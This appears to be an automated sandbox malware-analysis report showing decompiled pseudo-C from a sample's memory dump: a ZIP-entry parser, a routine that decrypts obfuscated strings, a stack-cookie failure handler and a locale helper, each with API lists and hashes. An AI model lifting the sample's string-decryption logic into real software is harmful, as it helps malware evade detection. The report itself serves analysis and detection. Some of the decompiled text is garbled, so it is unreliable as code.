				void* _t356;
				void* _t357;

				_t305 = __edx;
				_t158 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t158 ^ _t352;
				_t247 = _a4;
				_t345 = __ecx;
				_t344 = _a8;
				_v568 = __ecx;
				if(_t247 < 0xffffffff) {
					L68:
					__eflags = _v8 ^ _t352;
					return E0042A36A(0x10000, _t247, _v8 ^ _t352, _t305, _t344, _t345);
				} else {
					_t162 =  *__ecx;
					if(_t247 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L68;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
							E00406D80(__ecx, _t162);
							_t353 = _t353 + 4;
						}
						 *((intOrPtr*)(_t345 + 4)) = 0xffffffff;
						if(_t247 !=  *((intOrPtr*)(_t345 + 0x134))) {
							__eflags = _t247 - 0xffffffff;
							if(_t247 != 0xffffffff) {
								_t163 =  *_t345;
								__eflags = _t247 -  *((intOrPtr*)(_t163 + 0x10));
								if(_t247 <  *((intOrPtr*)(_t163 + 0x10))) {
									E004069D0(_t163);
									_t353 = _t353 + 4;
								}
								_t306 =  *_t345;
								__eflags =  *((intOrPtr*)(_t306 + 0x10)) - _t247;
								if( *((intOrPtr*)(_t306 + 0x10)) < _t247) {
									do {
										E00406A20( *_t345);
										_t299 =  *_t345;
										_t353 = _t353 + 4;
										__eflags =  *((intOrPtr*)(_t299 + 0x10)) - _t247;
									} while ( *((intOrPtr*)(_t299 + 0x10)) < _t247);
								}
								E00406650( *_t345,  &_v664, 0,  &_v268, 0x104, 0, 0, 0, 0);
								_t309 =  *_t345;
								_t167 = E00406BA0( &(_v564.dwHighDateTime),  *_t345,  &(_v564.dwHighDateTime),  &_v552,  &_v556);
								_t354 = _t353 + 0x34;
								__eflags = _t167;
								if(_t167 == 0) {
									_t169 =  *((intOrPtr*)( *_t345));
									__eflags =  *_t169;
									if(__eflags == 0) {
										 *((intOrPtr*)(_t169 + 0x1c)) = _v552;
										goto L19;
									} else {
										__eflags =  *((char*)(_t169 + 1));
										if(__eflags == 0) {
											L21:
											__eflags = _v8 ^ _t352;
											return E0042A36A(0x800, _t247, _v8 ^ _t352, _t309, _t344, _t345);
										} else {
											SetFilePointer( *(_t169 + 4),  *((intOrPtr*)(_t169 + 0xc)) + _v552, 0, 0);
											L19:
											_push(_v556);
											_t170 = E0042976C(_t344, _t345, __eflags);
											_t309 = _v556;
											_t247 = _t170;
											_t172 = E00406200(_t247, 1, _v556,  *((intOrPtr*)( *_t345)));
											_t355 = _t354 + 0x14;
											__eflags = _t172 - _v556;
											if(_t172 == _v556) {
												 *_t344 =  *((intOrPtr*)( *_t345 + 0x10));
												E0042BD00( &_v528,  &_v268);
												_t356 = _t355 + 8;
												_t346 =  &_v528;
												while(1) {
													_t176 =  *_t346;
													__eflags = _t176;
													if(_t176 == 0) {
														goto L26;
													}
													L24:
													__eflags =  *((char*)(_t346 + 1)) - 0x3a;
													if( *((char*)(_t346 + 1)) == 0x3a) {
														_t346 = _t346 + 2;
														while(1) {
															_t176 =  *_t346;
															__eflags = _t176;
															if(_t176 == 0) {
																goto L26;
															}
															goto L24;
														}
													}
													L26:
													__eflags = _t176 - 0x5c;
													if(_t176 == 0x5c) {
														_t346 = _t346 + 1;
														while(1) {
															_t176 =  *_t346;
															__eflags = _t176;
															if(_t176 == 0) {
																goto L26;
															}
															goto L24;
														}
													}
													__eflags = _t176 - 0x2f;
													if(_t176 == 0x2f) {
														_t346 = _t346 + 1;
														while(1) {
															_t176 =  *_t346;
															__eflags = _t176;
															if(_t176 == 0) {
																goto L26;
															}
															goto L24;
														}
													}
													_t177 = E0042CC8F(_t346, "\\..\\");
													_t356 = _t356 + 8;
													__eflags = _t177;
													if(_t177 != 0) {
														_t46 = _t177 + 4; // 0x4
														_t346 = _t46;
														while(1) {
															_t176 =  *_t346;
															__eflags = _t176;
															if(_t176 == 0) {
																goto L26;
															}
															goto L24;
														}
													}
													_t178 = E0042CC8F(_t346, "\\../");
													_t356 = _t356 + 8;
													__eflags = _t178;
													if(_t178 != 0) {
														_t47 = _t178 + 4; // 0x4
														_t346 = _t47;
														while(1) {
															_t176 =  *_t346;
															__eflags = _t176;
															if(_t176 == 0) {
																goto L26;
															}
															goto L24;
														}
													}
													_t179 = E0042CC8F(_t346, "/../");
													_t356 = _t356 + 8;
													__eflags = _t179;
													if(_t179 != 0) {
														_t48 = _t179 + 4; // 0x4
														_t346 = _t48;
														while(1) {
															_t176 =  *_t346;
															__eflags = _t176;
															if(_t176 == 0) {
																goto L26;
															}
															goto L24;
														}
														goto L26;
													}
													_t180 = E0042CC8F(_t346, "/..\\");
													_t356 = _t356 + 8;
													__eflags = _t180;
													if(_t180 != 0) {
														_t49 = _t180 + 4; // 0x4
														_t346 = _t49;
														continue;
													}
													E0042CB4B(_t344 + 4, _t346, 0x104);
													_t182 = _v612;
													_v545 = _t182 >> 0x0000001e & 0x00000001;
													_t258 = _v664 >> 8;
													_t357 = _t356 + 0xc;
													_t318 =  !(_t182 >> 0x17) & 0x00000001;
													_v547 = 0;
													_v548 = 0;
													_v546 = 1;
													__eflags = _t258;
													if(_t258 == 0) {
														L42:
														_v547 = _t182 >> 0x00000001 & 0x00000001;
														_v548 = _t182 >> 0x00000002 & 0x00000001;
														_t318 = _t182 & 0x00000001;
														_t267 = _t182 >> 0x00000004 & 0x00000001;
														_t184 = _t182 >> 0x00000005 & 0x00000001;
													} else {
														__eflags = _t258 - 7;
														if(_t258 == 7) {
															goto L42;
														} else {
															__eflags = _t258 - 0xb;
															if(_t258 == 0xb) {
																goto L42;
															} else {
																__eflags = _t258 - 0xe;
																if(_t258 != 0xe) {
																	_t184 = _v546;
																	_t267 = _v545;
																} else {
																	goto L42;
																}
															}
														}
													}
													 *(_t344 + 0x108) = 0;
													__eflags = _t267;
													if(_t267 != 0) {
														 *(_t344 + 0x108) = 0x10;
													}
													__eflags = _t184;
													if(_t184 != 0) {
														_t63 = _t344 + 0x108;
														 *_t63 =  *(_t344 + 0x108) | 0x00000020;
														__eflags =  *_t63;
													}
													__eflags = _v547;
													if(_v547 != 0) {
														_t66 = _t344 + 0x108;
														 *_t66 =  *(_t344 + 0x108) | 0x00000002;
														__eflags =  *_t66;
													}
													__eflags = _t318;
													if(_t318 != 0) {
														_t68 = _t344 + 0x108;
														 *_t68 =  *(_t344 + 0x108) | 0x00000001;
														__eflags =  *_t68;
													}
													__eflags = _v548;
													if(_v548 != 0) {
														_t71 = _t344 + 0x108;
														 *_t71 =  *(_t344 + 0x108) | 0x00000004;
														__eflags =  *_t71;
													}
													 *((intOrPtr*)(_t344 + 0x124)) = _v640;
													 *((intOrPtr*)(_t344 + 0x128)) = _v636;
													_t186 = _v648;
													_t269 = _t186 >> 0x10;
													_v544.wYear = (_t269 >> 9) + 0x7bc;
													_v544.wMonth = _t269 >> 0x00000005 & 0x0000000f;
													_v544.wDay = _t269 & 0x0000001f;
													_v544.wHour = _t186 >> 0xb;
													_v544.wMinute = _t186 >> 0x00000005 & 0x0000003f;
													_v544.wSecond = (_t186 & 0x0000001f) + (_t186 & 0x0000001f);
													_v544.wMilliseconds = 0;
													SystemTimeToFileTime( &_v544,  &_v564);
													_v584.dwLowDateTime = _v564.dwLowDateTime;
													_v584.dwHighDateTime = _v564.dwHighDateTime;
													LocalFileTimeToFileTime( &_v584,  &_v576);
													_t194 = _v576.dwLowDateTime;
													_t275 = _v576.dwHighDateTime;
													_t348 = 0;
													__eflags = _v556 - 4;
													 *(_t344 + 0x10c) = _t194;
													 *(_t344 + 0x110) = _t275;
													 *(_t344 + 0x114) = _t194;
													 *(_t344 + 0x118) = _t275;
													 *(_t344 + 0x11c) = _t194;
													 *(_t344 + 0x120) = _t275;
													if(_v556 > 4) {
														while(1) {
															_v552 =  *((intOrPtr*)(_t348 + _t247));
															_v551 =  *((intOrPtr*)(_t247 + _t348 + 1));
															_v550 = 0;
															_v564.dwHighDateTime =  *(_t247 + _t348 + 2) & 0x000000ff;
															_t201 = E0042CD30( &_v552, "UT");
															_t357 = _t357 + 8;
															__eflags = _t201;
															if(_t201 == 0) {
																break;
															}
															_t348 = _t348 + _v564.dwHighDateTime + 4;
															__eflags = _t348 + 4 - _v556;
															if(_t348 + 4 < _v556) {
																continue;
															} else {
															}
															goto L65;
														}
														_t202 =  *(_t348 + _t247 + 4) & 0x000000ff;
														_t350 = _t348 + 5;
														_v545 = _t202 >> 0x00000001 & 0x00000001;
														_v546 = _t202 >> 0x00000002 & 0x00000001;
														__eflags = _t202 & 0x00000001;
														if((_t202 & 0x00000001) != 0) {
															_t341 =  *(_t350 + _t247 + 1) & 0x000000ff;
															_t227 = ((( *(_t350 + _t247 + 3) & 0x000000ff) << 0x00000008 |  *(_t350 + _t247 + 2) & 0x000000ff) << 0x00000008 | _t341) << 0x00000008 |  *(_t350 + _t247) & 0x000000ff;
															asm("cdq");
															_t350 = _t350 + 4;
															__eflags = _t227 + 0xb6109100;
															asm("adc edx, 0x2");
															 *(_t344 + 0x11c) = E0042CCB0(_t227 + 0xb6109100, _t341, 0x989680, 0);
															 *(_t344 + 0x120) = _t341;
														}
														__eflags = _v545;
														if(_v545 != 0) {
															_t340 =  *(_t350 + _t247) & 0x000000ff;
															_t218 = ((( *(_t350 + _t247 + 3) & 0x000000ff) << 0x00000008 |  *(_t350 + _t247 + 2) & 0x000000ff) << 0x00000008 |  *(_t350 + _t247 + 1) & 0x000000ff) << 0x00000008 | _t340;
															asm("cdq");
															_t350 = _t350 + 4;
															__eflags = _t218 + 0xb6109100;
															asm("adc edx, 0x2");
															 *(_t344 + 0x10c) = E0042CCB0(_t218 + 0xb6109100, _t340, 0x989680, 0);
															 *(_t344 + 0x110) = _t340;
														}
														__eflags = _v546;
														if(_v546 != 0) {
															_t338 =  *(_t350 + _t247) & 0x000000ff;
															asm("cdq");
															__eflags = (((( *(_t350 + _t247 + 3) & 0x000000ff) << 0x00000008 |  *(_t350 + _t247 + 2) & 0x000000ff) << 0x00000008 |  *(_t350 + _t247 + 1) & 0x000000ff) << 0x00000008 | _t338) + 0xb6109100;
															asm("adc edx, 0x2");
															 *(_t344 + 0x114) = E0042CCB0((((( *(_t350 + _t247 + 3) & 0x000000ff) << 0x00000008 |  *(_t350 + _t247 + 2) & 0x000000ff) << 0x00000008 |  *(_t350 + _t247 + 1) & 0x000000ff) << 0x00000008 | _t338) + 0xb6109100, _t338, 0x989680, 0);
															 *(_t344 + 0x118) = _t338;
														}
													}
													L65:
													__eflags = _t247;
													if(_t247 != 0) {
														_push(_t247);
														E0042CDB8();
														_t357 = _t357 + 4;
													}
													_t349 = _v568;
													E0042B8D0(_t349 + 8, _t344, 0x12c);
													 *(_t349 + 0x134) = _a4;
													__eflags = _v8 ^ _t352;
													return E0042A36A(0, _t247, _v8 ^ _t352, _t349 + 8, _t344, _t349);
													goto L69;
												}
											} else {
												_push(_t247);
												E0042CDB8();
												goto L21;
											}
										}
									}
								} else {
									__eflags = _v8 ^ _t352;
									return E0042A36A(0x700, _t247, _v8 ^ _t352, _t309, _t344, _t345);
								}
							} else {
								goto L8;
							}
						} else {
							if(_t247 == 0xffffffff) {
								L8:
								 *_t344 =  *((intOrPtr*)( *_t345 + 4));
								 *((char*)(_t344 + 4)) = 0;
								 *(_t344 + 0x108) = 0;
								 *(_t344 + 0x10c) = 0;
								 *(_t344 + 0x110) = 0;
								 *(_t344 + 0x114) = 0;
								 *(_t344 + 0x118) = 0;
								 *(_t344 + 0x11c) = 0;
								 *(_t344 + 0x120) = 0;
								 *((intOrPtr*)(_t344 + 0x124)) = 0;
								 *((intOrPtr*)(_t344 + 0x128)) = 0;
								__eflags = _v8 ^ _t352;
								return E0042A36A(0, _t247, _v8 ^ _t352, _t305, _t344, _t345);
							} else {
								E0042B8D0(_t344, _t345 + 8, 0x12c);
								return E0042A36A(0, _t247, _v8 ^ _t352, _t305, _t344, _t345 + 8);
							}
						}
					}
				}
				L69:
			}

0x00406e10
0x00406e19
0x00406e20
0x00406e24
0x00406e28
0x00406e2b
0x00406e2e
0x00406e37
0x00407447
0x0040744c
0x0040745c
0x00406e3d
0x00406e3d
0x00406e42
0x00000000
0x00406e48
0x00406e4c
0x00406e4f
0x00406e54
0x00406e54
0x00406e57
0x00406e64
0x00406e92
0x00406e95
0x00406eed
0x00406eef
0x00406ef2
0x00406ef5
0x00406efa
0x00406efa
0x00406efd
0x00406eff
0x00406f02
0x00406f04
0x00406f07
0x00406f0c
0x00406f0e
0x00406f11
0x00406f11
0x00406f04
0x00406f36
0x00406f42
0x00406f53
0x00406f58
0x00406f5b
0x00406f5d
0x00406f79
0x00406f7b
0x00406f7e
0x00406fa6
0x00000000
0x00406f80
0x00406f80
0x00406f84
0x00406fe1
0x00406fea
0x00406ff4
0x00406f86
0x00406f98
0x00406fa9
0x00406faf
0x00406fb0
0x00406fb5
0x00406fbb
0x00406fc6
0x00406fcb
0x00406fce
0x00406fd4
0x0040700a
0x0040700c
0x00407011
0x00407014
0x00407020
0x00407020
0x00407022
0x00407024
0x00000000
0x00000000
0x00407026
0x00407026
0x0040702a
0x0040702c
0x00407020
0x00407020
0x00407022
0x00407024
0x00000000
0x00000000
0x00000000
0x00407024
0x00407020
0x00407031
0x00407031
0x00407033
0x00407035
0x00407020
0x00407020
0x00407022
0x00407024
0x00000000
0x00000000
0x00000000
0x00407024
0x00407020
0x00407038
0x0040703a
0x0040703c
0x00407020
0x00407020
0x00407022
0x00407024
0x00000000
0x00000000
0x00000000
0x00407024
0x00407020
0x00407045
0x0040704a
0x0040704d
0x0040704f
0x00407051
0x00407051
0x00407020
0x00407020
0x00407022
0x00407024
0x00000000
0x00000000
0x00000000
0x00407024
0x00407020
0x0040705c
0x00407061
0x00407064
0x00407066
0x00407068
0x00407068
0x00407020
0x00407020
0x00407022
0x00407024
0x00000000
0x00000000
0x00000000
0x00407024
0x00407020
0x00407073
0x00407078
0x0040707b
0x0040707d
0x0040707f
0x0040707f
0x00407020
0x00407020
0x00407022
0x00407024
0x00000000
0x00000000
0x00000000
0x00407024
0x00000000
0x00407020
0x0040708a
0x0040708f
0x00407092
0x00407094
0x00407096
0x00407096
0x00000000
0x00407096
0x004070a5
0x004070aa
0x004070be
0x004070cb
0x004070ce
0x004070d1
0x004070d4
0x004070db
0x004070e2
0x004070e9
0x004070eb
0x004070fc
0x00407103
0x00407111
0x00407121
0x00407124
0x00407127
0x004070ed
0x004070ed
0x004070f0
0x00000000
0x004070f2
0x004070f2
0x004070f5
0x00000000
0x004070f7
0x004070f7
0x004070fa
0x0040712b
0x00407131
0x00000000
0x00000000
0x00000000
0x004070fa
0x004070f5
0x004070f0
0x00407137
0x00407141
0x00407143
0x00407145
0x00407145
0x0040714f
0x00407151
0x00407153
0x00407153
0x00407153
0x00407153
0x0040715a
0x00407161
0x00407163
0x00407163
0x00407163
0x00407163
0x0040716a
0x0040716c
0x0040716e
0x0040716e
0x0040716e
0x0040716e
0x00407175
0x0040717c
0x0040717e
0x0040717e
0x0040717e
0x0040717e
0x00407191
0x00407197
0x0040719d
0x004071a5
0x004071b7
0x004071c9
0x004071d0
0x004071e9
0x004071f8
0x004071ff
0x00407210
0x00407217
0x0040722f
0x0040723d
0x00407243
0x00407249
0x0040724f
0x00407255
0x00407257
0x0040725e
0x00407264
0x0040726a
0x00407270
0x00407276
0x0040727c
0x00407282
0x00407290
0x0040729c
0x004072ae
0x004072b4
0x004072bb
0x004072c1
0x004072c6
0x004072c9
0x004072cb
0x00000000
0x00000000
0x004072d3
0x004072da
0x004072e0
0x00000000
0x00000000
0x004072e2
0x00000000
0x004072e0
0x004072e7
0x004072fb
0x004072fe
0x00407304
0x0040730a
0x0040730c
0x00407318
0x0040732e
0x00407330
0x00407333
0x00407336
0x00407340
0x0040734f
0x00407355
0x00407355
0x0040735b
0x00407362
0x00407378
0x00407384
0x00407386
0x00407389
0x0040738c
0x00407396
0x004073a5
0x004073ab
0x004073ab
0x004073b1
0x004073b8
0x004073ce
0x004073dc
0x004073df
0x004073e9
0x004073f8
0x004073fe
0x004073fe
0x004073b8
0x00407404
0x00407404
0x00407406
0x00407408
0x00407409
0x0040740e
0x0040740e
0x00407411
0x00407421
0x0040742d
0x0040743a
0x00407444
0x00000000
0x00407444
0x00406fd6
0x00406fd6
0x00406fd7
0x00000000
0x00406fdc
0x00406fd4
0x00406f84
0x00406f61
0x00406f6a
0x00406f74
0x00406f74
0x00000000
0x00000000
0x00000000
0x00406e66
0x00406e69
0x00406e97
0x00406e9e
0x00406ea0
0x00406ea4
0x00406eaa
0x00406eb0
0x00406eb6
0x00406ebc
0x00406ec2
0x00406ec8
0x00406ece
0x00406ed4
0x00406ee0
0x00406eea
0x00406e6b
0x00406e75
0x00406e8f
0x00406e8f
0x00406e69
0x00406e64
0x00406e42
0x00000000

Strings

\..\, xrefs: 0040703F
/../, xrefs: 0040706D
/..\, xrefs: 00407084
\../, xrefs: 00407056

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID: /../$/..\$\../$\..\
API String ID: 0-3885502717
Opcode ID: 27a357cc446f0f8ee2d59c8b4c147db309874133d7be3d8ecca1b5f89a141b38
Instruction ID: ec992ec6301b8e00cf5f89282a411d890f405c633d64647ea77b68544fa22b2f
Opcode Fuzzy Hash: 27a357cc446f0f8ee2d59c8b4c147db309874133d7be3d8ecca1b5f89a141b38
Instruction Fuzzy Hash: D0025AB1E042149BDB24DF24DC857EAB7F0EF54300F0442AEE989A7381D338BA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00414D80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E00414D80(void* __ebx, char* _a4) {
				signed int _v8;
				int _v8104;
				int _v8108;
				DWORD* _v8112;
				DWORD* _v8116;
				char _v8120;
				int _v8124;
				DWORD* _v8128;
				char _v8132;
				void* __edi;
				void* __esi;
				signed int _t27;
				void* _t37;
				void* _t44;
				signed int _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t50 = __ebx;
				E0042BC40(0x1fc0);
				_t27 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t27 ^ _t66;
				_t65 = _a4;
				_v8108 = 0x1fa0;
				E0042A2F0( &_v8104, 0, 0x1fa0);
				_t68 = _t67 + 0xc;
				_push(0);
				_t61 =  &_v8104;
				if(CryptStringToBinaryA(_a4,  *0x464758(), _a4, 1,  &_v8104,  &_v8108, 0) == 0) {
					L7:
					return E0042A36A(0x443c1c, _t50, _v8 ^ _t66, _t61, 0x443c1c, _t65);
				} else {
					_t65 =  *0x453d6c();
					if(_t65 == 0) {
						 *0x464860(0x443c1c, 0x443c1c);
						goto L7;
					} else {
						_t37 =  *0x453db4(_t65, 1, 0);
						_t69 = _t68 + 0xc;
						if(_t37 != 0) {
							L5:
							 *0x464860(0x443c1c, 0x443c1c);
							 *0x453d94();
							return E0042A36A(0x443c1c, _t50, _v8 ^ _t66, _t61, 0x443c1c, _t65, _t65);
						} else {
							_t61 =  &_v8120;
							_v8128 =  &_v8104;
							_v8124 = _v8108;
							_v8116 = 0;
							_v8112 = 0;
							_t44 =  *0x453d8c( &_v8132,  &_v8120, 0);
							_t69 = _t69 + 0xc;
							if(_t44 != 0) {
								goto L5;
							} else {
								E0042B8D0( &_v8104, _v8116, _v8112);
								 *((char*)(_t66 + _v8112 - 0x1fa4)) = 0;
								 *0x453d94();
								return E0042A36A( &_v8104, __ebx, _v8 ^ _t66, _v8116,  &_v8104, _t65, _t65);
							}
						}
					}
				}
			}

0x00414d80
0x00414d88
0x00414d8d
0x00414d94
0x00414d98
0x00414daa
0x00414db9
0x00414dbe
0x00414dc1
0x00414dcc
0x00414de6
0x00414ee4
0x00414ef5
0x00414dec
0x00414df2
0x00414df6
0x00414ede
0x00000000
0x00414dfc
0x00414e01
0x00414e07
0x00414e0c
0x00414ea8
0x00414eb2
0x00414eb9
0x00414ed3
0x00414e12
0x00414e20
0x00414e26
0x00414e34
0x00414e3a
0x00414e44
0x00414e4e
0x00414e54
0x00414e59
0x00000000
0x00414e5b
0x00414e70
0x00414e7f
0x00414e8d
0x00414ea7
0x00414ea7
0x00414e59
0x00414e0c
0x00414df6

APIs

_memset.LIBCMT ref: 00414DB9
lstrlen.KERNEL32(00415A24,00000001,?,?,00000000,00000000,?,00415A24,00000003,?,?,?,00417D07), ref: 00414DD6
CryptStringToBinaryA.CRYPT32(00415A24,00000000,?,00415A24,00000003), ref: 00414DDE
lstrcat.KERNEL32(00443C1C,00443C1C), ref: 00414EB2
lstrcat.KERNEL32(00443C1C,00443C1C), ref: 00414EDE

Strings

KdA, xrefs: 00414D97

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$BinaryCryptString_memsetlstrlen
String ID: KdA
API String ID: 416098046-2210686102
Opcode ID: b65d4a22092d44d7d3ece5aa1b71356c4c2b4245cb7b12bb8c1cae58f82472f7
Instruction ID: ceca76894a6fdecbe718fa9d3309b757b2eb390044352e7e770eada17a0de940
Opcode Fuzzy Hash: b65d4a22092d44d7d3ece5aa1b71356c4c2b4245cb7b12bb8c1cae58f82472f7
Instruction Fuzzy Hash: 9A31C671A002195BDB10DF54EC45BEEB778EF84706F4440BAF90DA6281DBB85E448F9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A36A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0042A36A(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x451f00; // 0xc21d6f0a
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x464cf0 = _t6;
				 *0x464cec = _t22;
				 *0x464ce8 = _t25;
				 *0x464ce4 = _t21;
				 *0x464ce0 = _t27;
				 *0x464cdc = _t26;
				 *0x464d08 = ss;
				 *0x464cfc = cs;
				 *0x464cd8 = ds;
				 *0x464cd4 = es;
				 *0x464cd0 = fs;
				 *0x464ccc = gs;
				asm("pushfd");
				_pop( *0x464d00);
				 *0x464cf4 =  *_t31;
				 *0x464cf8 = _v0;
				 *0x464d04 =  &_a4;
				 *0x464c40 = 0x10001;
				_t11 =  *0x464cf8; // 0x0
				 *0x464bf4 = _t11;
				 *0x464be8 = 0xc0000409;
				 *0x464bec = 1;
				_t12 =  *0x451f00; // 0xc21d6f0a
				_v812 = _t12;
				_t13 =  *0x451f04; // 0x3de290f5
				_v808 = _t13;
				 *0x464c38 = IsDebuggerPresent();
				_push(1);
				E00439055(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("\xef\xbf\				if( *0x464c38 == 0) {
					_push(1);
					E00439055(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0042a36a
0x0042a36a
0x0042a36a
0x0042a36a
0x0042a36a
0x0042a36a
0x0042a36a
0x0042a370
0x0042a372
0x0042a372
0x00430c43
0x00430c48
0x00430c4e
0x00430c54
0x00430c5a
0x00430c60
0x00430c66
0x00430c6d
0x00430c74
0x00430c7b
0x00430c82
0x00430c89
0x00430c90
0x00430c91
0x00430c9a
0x00430ca2
0x00430caa
0x00430cb5
0x00430cbf
0x00430cc4
0x00430cc9
0x00430cd3
0x00430cdd
0x00430ce2
0x00430ce8
0x00430ced
0x00430cf9
0x00430cfe
0x00430d00
0x00430d08
0x00430d13
0x00430d20
0x00430d22
0x00430d24
0x00430d29
0x00430d3d

APIs

IsDebuggerPresent.KERNEL32 ref: 00430CF3
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00430D08
UnhandledExceptionFilter.KERNEL32(KF), ref: 00430D13
GetCurrentProcess.KERNEL32(C0000409), ref: 00430D2F
TerminateProcess.KERNEL32(00000000), ref: 00430D36

Strings

KF, xrefs: 00430D0E

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: KF
API String ID: 2579439406-1745086199
Opcode ID: 5dc3bfb8d4ea69b84dde211b49924277f9b9f9f2b7b3684320c136858688fdd5
Instruction ID: f44bdc9d47fce428d555860b2b07167c9edab84af1608d9af595798bd1aa6f01
Opcode Fuzzy Hash: 5dc3bfb8d4ea69b84dde211b49924277f9b9f9f2b7b3684320c136858688fdd5
Instruction Fuzzy Hash: 8021C0B89023049FDB54DF69F944A443BB4BB89711F12503AE90987360FBF49981CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00437D69 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00437D69(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E0042CD30(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E0042CD30(__esi, ?str?) != 0) {
						_v8 = E0042D00A(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}

0x00437d69
0x00437d71
0x00437dd9
0x00437de3
0x00000000
0x00437de5
0x00437dec
0x00437dec
0x00000000
0x00000000
0x00000000
0x00437d89
0x00437d98
0x00437dbe
0x00000000
0x00437d9a
0x00437db0
0x00437ddb
0x00437dde
0x00437db2
0x00437db2
0x00437db6
0x00437db6
0x00437db0
0x00437d98

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,004383A6,?,0042F22D,?,000000BC,?,00000001,00000000,00000000), ref: 00437DA8
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,004383A6,?,0042F22D,?,000000BC,?,00000001,00000000,00000000), ref: 00437DD1
GetACP.KERNEL32(?,?,004383A6,?,0042F22D,?,000000BC,?,00000001,00000000), ref: 00437DE5

Strings

OCP, xrefs: 00437D89
ACP, xrefs: 00437D78

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c975a722215098a85780caec6ddd84454bd332286dbef323d992c2a3c6827199
Instruction ID: 3a3b29563329de59ba96028b68f1385b407fa94ca8afac13edf624976fcde47e
Opcode Fuzzy Hash: c975a722215098a85780caec6ddd84454bd332286dbef323d992c2a3c6827199
Instruction Fuzzy Hash: 54014C71608616BAEB318B21FC41FAF7AA8AF08318F20402FF541E11C0E73CDE4186AD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414FC0(char _a4, void** _a8, DWORD* _a12) {
				BYTE* _t7;
				int _t8;
				char* _t11;
				void** _t13;
				DWORD* _t14;
				int _t15;

				_t1 =  &_a4; // 0x43eee8
				_t11 =  *_t1;
				_t14 = _a12;
				_t13 = _a8;
				 *_t13 = 0;
				 *_t14 = 0;
				if(CryptStringToBinaryA(_t11, 0, 1, 0, _t14, 0, 0) == 0) {
					L4:
					return 0;
				}
				_t7 = LocalAlloc(0x40,  *_t14);
				 *_t13 = _t7;
				if(_t7 == 0) {
					goto L4;
				}
				_t8 = CryptStringToBinaryA(_t11, 0, 1, _t7, _t14, 0, 0);
				_t15 = _t8;
				if(_t15 != 0) {
					return _t8;
				} else {
					 *_t13 = LocalFree( *_t13);
					return _t15;
				}
			}

0x00414fc4
0x00414fc4
0x00414fc8
0x00414fcc
0x00414fda
0x00414fe1
0x00414fef
0x0041502b
0x00000000
0x0041502b
0x00414ff6
0x00414ffc
0x00415000
0x00000000
0x00000000
0x0041500d
0x00415013
0x00415017
0x00415031
0x00415019
0x00415022
0x0041502a
0x0041502a

APIs

